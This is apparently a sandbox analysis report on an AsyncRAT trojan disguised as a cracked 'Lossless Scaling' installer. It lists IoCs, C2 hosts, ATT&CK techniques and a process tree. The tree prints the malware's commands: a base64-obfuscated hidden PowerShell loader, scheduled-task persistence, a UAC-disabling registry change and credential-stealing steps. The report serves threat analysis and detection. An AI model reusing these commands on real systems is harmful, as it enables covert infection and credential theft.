asyncrat | 653c00ae23b0d0001ab2d962daef99c15dbc83b3c676b9f79249ebd757c78d2e

Analysis

max time kernel
137s
max time network
146s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
12/03/2025, 10:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

lossless scaling.zip
Size

5.5MB
MD5

7cad413146081f6315d82b1dfbebc256
SHA1

5ef84bec1e3b9d5c62a95b08ac133991a1951bf4
SHA256

653c00ae23b0d0001ab2d962daef99c15dbc83b3c676b9f79249ebd757c78d2e
SHA512

e82b5caf11830d2dfef2b8d8c3a5eed116e68ed3f9b4259953155f8474e682bb56b3b7d9e64d8e07b4acf5c22540eb3620a3199e79c161c0eb705ea11179ae74
SSDEEP

98304:Uyf2ZCmbGVSS7jQ3TyQfVp2EhpyZ6DVvpnPqf7waG159wwo2QOWIAeukWahTDCQM:/mUSS7M3TyQfzyZ0dtdm2QbIAeqa5mr5

Score

10^/10

asyncrat default collection defense_evasion discovery execution privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

asyncrat

Version

A 14

Botnet

Default

puka1.work.gd:408

puka1.ddnsfree.com:408

ramdan.mywire.org:408

Mutex

MaterxMutex_Egypt408

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

UAC bypass 3 TTPs 3 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3896	powershell.exe
1176	powershell.exe
2484	powershell.exe
1964	powershell.exe
1264	powershell.exe
4464	powershell.exe
4620	powershell.exe
3344	powershell.exe
4936	powershell.exe
2092	powershell.exe
552	powershell.exe
4284	powershell.exe

Executes dropped EXE 9 IoCs

pid	Process
572	LosslessScaling.exe
5028	RAR.exe
328	LosslessScaling.exe
4888	dismhost.exe
1032	RAR.exe
1088	dismhost.exe
404	LosslessScaling.exe
5016	RAR.exe
4756	a.exe

Loads dropped DLL 50 IoCs

pid	Process
572	LosslessScaling.exe
328	LosslessScaling.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
4888	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
1088	dismhost.exe
404	LosslessScaling.exe
1088	dismhost.exe
1088	dismhost.exe
4756	a.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2800786028-4028220528-1905518260-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	a.exe

Enumerates connected drives 3 TTPs 3 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	cmd.exe
File opened (read-only)	\??\E:	cmd.exe
File opened (read-only)	\??\E:	cmd.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 4284 set thread context of 4264	4284	powershell.exe	126
PID 4464 set thread context of 2332	4464	powershell.exe	130
PID 4620 set thread context of 1560	4620	powershell.exe	152
PID 3344 set thread context of 4888	3344	powershell.exe	154
PID 4936 set thread context of 772	4936	powershell.exe	183
PID 2092 set thread context of 4360	2092	powershell.exe	185

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Lossless Scaling\Lan.vbs	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\de\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\he\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\hr\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe.config	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\pt-BR\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\Lossless.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\hr\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\tr\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\bg\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\bg\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\fa\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\lt\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\ar\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\zh-TW\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\cs\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\hr\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\Lan.vbs	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\it\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\ja\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\sr-Latn\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\zh-CN\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\cs\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\id\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\ja\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\pt-PT\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\Lossless Scaling.lnk	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\fa\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\sr-Latn\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\tr\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\lt\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\cs\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\de\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\id\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\es-ES\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\tr\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\Lan.vbs	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\es-ES\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\uk\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\fr\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\Lan.vbs	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\it\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\vi\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\de\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\vi\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\fr\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\pl\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\uk\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\uk\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\ro\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\tr\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\uk\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\Licenses.txt	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\es-ES\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\it\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\ko\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\ko\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\ro\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\tr\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\Licenses.txt	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\he\LosslessScaling.resources.dll	powershell.exe
File opened for modification	C:\Program Files (x86)\Lossless Scaling\he\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\ko\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\he\LosslessScaling.resources.dll	powershell.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
4716	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe

Modifies Control Panel 3 IoCs

defense_evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2800786028-4028220528-1905518260-1000\Control Panel\Colors	LosslessScaling.exe
Key created	\REGISTRY\USER\S-1-5-21-2800786028-4028220528-1905518260-1000\Control Panel\Colors	LosslessScaling.exe
Key created	\REGISTRY\USER\S-1-5-21-2800786028-4028220528-1905518260-1000\Control Panel\Colors	LosslessScaling.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2800786028-4028220528-1905518260-1000_Classes\Local Settings	aspnet_compiler.exe
Key created	\REGISTRY\USER\S-1-5-21-2800786028-4028220528-1905518260-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2800786028-4028220528-1905518260-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2800786028-4028220528-1905518260-1000_Classes\Local Settings	powershell.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
876	reg.exe
4904	reg.exe
2464	reg.exe

Runs .reg file with regedit 1 IoCs

pid	Process
2812	regedit.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1916	schtasks.exe
3508	schtasks.exe
4480	schtasks.exe
1224	schtasks.exe
4856	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2332	aspnet_compiler.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3896	powershell.exe
3896	powershell.exe
1264	powershell.exe
1264	powershell.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
1264	powershell.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
1176	powershell.exe
1176	powershell.exe
552	powershell.exe
552	powershell.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
4284	powershell.exe
4464	powershell.exe
4284	powershell.exe
4284	powershell.exe
4464	powershell.exe
4464	powershell.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
4464	powershell.exe
4464	powershell.exe
4464	powershell.exe
4464	powershell.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
2332	aspnet_compiler.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
552	powershell.exe
552	powershell.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
4620	powershell.exe
4620	powershell.exe
4620	powershell.exe
3344	powershell.exe
3344	powershell.exe
3344	powershell.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
572	LosslessScaling.exe
2484	powershell.exe
2484	powershell.exe
2484	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
572	LosslessScaling.exe
572	LosslessScaling.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	572	LosslessScaling.exe
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	552	powershell.exe
Token: SeDebugPrivilege	4284	powershell.exe
Token: SeDebugPrivilege	4464	powershell.exe
Token: SeDebugPrivilege	2332	aspnet_compiler.exe
Token: SeBackupPrivilege	396	Dism.exe
Token: SeRestorePrivilege	396	Dism.exe
Token: SeDebugPrivilege	4620	powershell.exe
Token: SeDebugPrivilege	3344	powershell.exe
Token: SeDebugPrivilege	2484	powershell.exe
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeBackupPrivilege	3000	Dism.exe
Token: SeRestorePrivilege	3000	Dism.exe
Token: SeDebugPrivilege	4756	a.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4264	lossless scaling.exe
4264	lossless scaling.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
4264	lossless scaling.exe
4264	lossless scaling.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
572	LosslessScaling.exe
328	LosslessScaling.exe
2332	aspnet_compiler.exe
404	LosslessScaling.exe
4756	a.exe
4756	a.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2808 wrote to memory of 1456	2808	cmd.exe	92
PID 2808 wrote to memory of 1456	2808	cmd.exe	92
PID 1456 wrote to memory of 3428	1456	net.exe	93
PID 1456 wrote to memory of 3428	1456	net.exe	93
PID 2808 wrote to memory of 3896	2808	cmd.exe	94
PID 2808 wrote to memory of 3896	2808	cmd.exe	94
PID 3896 wrote to memory of 1264	3896	powershell.exe	95
PID 3896 wrote to memory of 1264	3896	powershell.exe	95
PID 1264 wrote to memory of 876	1264	powershell.exe	96
PID 1264 wrote to memory of 876	1264	powershell.exe	96
PID 1264 wrote to memory of 572	1264	powershell.exe	97
PID 1264 wrote to memory of 572	1264	powershell.exe	97
PID 1264 wrote to memory of 4360	1264	powershell.exe	99
PID 1264 wrote to memory of 4360	1264	powershell.exe	99
PID 1264 wrote to memory of 2900	1264	powershell.exe	100
PID 1264 wrote to memory of 2900	1264	powershell.exe	100
PID 1264 wrote to memory of 5028	1264	powershell.exe	102
PID 1264 wrote to memory of 5028	1264	powershell.exe	102
PID 5004 wrote to memory of 2480	5004	cmd.exe	106
PID 5004 wrote to memory of 2480	5004	cmd.exe	106
PID 2480 wrote to memory of 3316	2480	net.exe	107
PID 2480 wrote to memory of 3316	2480	net.exe	107
PID 5004 wrote to memory of 1176	5004	cmd.exe	108
PID 5004 wrote to memory of 1176	5004	cmd.exe	108
PID 1176 wrote to memory of 552	1176	powershell.exe	109
PID 1176 wrote to memory of 552	1176	powershell.exe	109
PID 552 wrote to memory of 4904	552	powershell.exe	110
PID 552 wrote to memory of 4904	552	powershell.exe	110
PID 552 wrote to memory of 328	552	powershell.exe	111
PID 552 wrote to memory of 328	552	powershell.exe	111
PID 1264 wrote to memory of 1468	1264	powershell.exe	112
PID 1264 wrote to memory of 1468	1264	powershell.exe	112
PID 1264 wrote to memory of 1636	1264	powershell.exe	114
PID 1264 wrote to memory of 1636	1264	powershell.exe	114
PID 1264 wrote to memory of 3596	1264	powershell.exe	115
PID 1264 wrote to memory of 3596	1264	powershell.exe	115
PID 1264 wrote to memory of 1916	1264	powershell.exe	116
PID 1264 wrote to memory of 1916	1264	powershell.exe	116
PID 1468 wrote to memory of 4464	1468	WScript.exe	119
PID 1468 wrote to memory of 4464	1468	WScript.exe	119
PID 1636 wrote to memory of 4284	1636	WScript.exe	120
PID 1636 wrote to memory of 4284	1636	WScript.exe	120
PID 1264 wrote to memory of 396	1264	powershell.exe	123
PID 1264 wrote to memory of 396	1264	powershell.exe	123
PID 396 wrote to memory of 4888	396	Dism.exe	124
PID 396 wrote to memory of 4888	396	Dism.exe	124
PID 4284 wrote to memory of 4264	4284	powershell.exe	126
PID 4284 wrote to memory of 4264	4284	powershell.exe	126
PID 4284 wrote to memory of 4264	4284	powershell.exe	126
PID 4284 wrote to memory of 4264	4284	powershell.exe	126
PID 4284 wrote to memory of 4264	4284	powershell.exe	126
PID 4284 wrote to memory of 4264	4284	powershell.exe	126
PID 4284 wrote to memory of 4264	4284	powershell.exe	126
PID 4284 wrote to memory of 4264	4284	powershell.exe	126
PID 4284 wrote to memory of 1872	4284	powershell.exe	127
PID 4284 wrote to memory of 1872	4284	powershell.exe	127
PID 4464 wrote to memory of 2296	4464	powershell.exe	128
PID 4464 wrote to memory of 2296	4464	powershell.exe	128
PID 4464 wrote to memory of 2296	4464	powershell.exe	128
PID 4464 wrote to memory of 3732	4464	powershell.exe	129
PID 4464 wrote to memory of 3732	4464	powershell.exe	129
PID 4464 wrote to memory of 3732	4464	powershell.exe	129
PID 4464 wrote to memory of 2332	4464	powershell.exe	130
PID 4464 wrote to memory of 2332	4464	powershell.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\lossless scaling.zip"
1⤵
PID:3104

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""E:\install + Crack.bat" "
1⤵
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:2808
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1456
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:3428
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$b='"cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSBsYW5ndWFnZS93aW5feC5wczE="';Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b)))"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3896
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File language/win_x.ps1
    3⤵
    - UAC bypass
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Program Files directory
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1264
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" ADD HKCU\SOFTWARE\Valve\Steam\Apps\993090 /v Installed /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:876
  - - C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe
      "C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies Control Panel
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:572
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /query /tn administrator
      4⤵
      PID:4360
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /query /tn Backup1
      4⤵
      PID:2900
  - - C:\Users\Public\IObitUnlocker\RAR.exe
      "C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\
      4⤵
      Executes dropped EXE
      PID:5028
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1468
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4464
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        
        PID:2296
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        
        PID:3732
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2332
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\External\Components\11.vbs"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2516
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c set __COMPAT_LAYER=RunAsInvoker && C:\Users\Public\External\Components\a.exe C:\Users\Public\pass.csv
        8⤵
        Access Token Manipulation: Create Process with Token
        System Location Discovery: System Language Discovery
        
        PID:4716
        
        C:\Users\Public\External\Components\a.exe
        
        C:\Users\Public\External\Components\a.exe C:\Users\Public\pass.csv
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4756
      - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /query /tn administrator
        6⤵
        
        PID:2712
      - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /tn administrator /sc minute /mo 2 /tr C:\Users\Public\IObitUnlocker\Loader.vbs /rl HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4480
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Backup.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1636
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4284
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4264
      - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /query /tn administrator
        6⤵
        
        PID:1872
      - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /tn administrator /sc minute /mo 2 /tr C:\Users\Public\IObitUnlocker\Loader.vbs /rl HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3508
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /query /tn Backup1
      4⤵
      PID:3596
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /tn administartor /SC minute /MO 2 /tr C:\Users\Public\IObitUnlocker\Loader.vbs /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1916
  - - C:\Windows\system32\Dism.exe
      "C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx3
      4⤵
      Drops file in Windows directory
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:396
    - - C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\dismhost.exe {659D6ED2-DAB8-445B-8C83-A1379A68FEBA}
        5⤵
